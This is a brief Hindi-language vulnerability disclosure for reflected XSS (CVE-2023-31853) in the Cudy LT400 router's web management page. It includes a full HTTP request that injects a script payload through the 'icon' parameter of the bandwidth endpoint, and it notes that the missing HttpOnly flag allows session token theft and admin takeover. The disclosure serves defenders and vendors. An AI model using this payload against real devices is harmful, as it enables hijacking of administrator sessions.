
Cudy LT400 वेब प्रबंधन इंटरफ़ेस में परावर्तित XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो /cgi-bin/luci/admin/network/bandwidth एंडपॉइंट के माध्यम से सत्र टोकन चोरी को सक्षम करता है।
Cudy LT400 के वेब-आधारित प्रबंधन इंटरफ़ेस में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला मौजूद है।
पेज /cgi-bin/luci/admin/network/bandwidth में icon पैरामीटर के माध्यम से रिफ्लेक्टेड XSS है।
हमले के तरीकों में पीड़ित को एक विशेष रूप से तैयार अनुरोध भेजना शामिल होगा जिसमें दुर्भावनापूर्ण कोड हो।
प्रभावित एप्लिकेशन सत्र कुकी को HttpOnly विशेषता के साथ सेट नहीं करता है; इसके परिणामस्वरूप सत्र टोकन की चोरी के माध्यम से व्यवस्थापक का अधिग्रहण हो सकता है।
GET /cgi-bin/luci/admin/network/bandwidth?iface=4g&icon=icon-4g%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&i18name=Cellular HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31853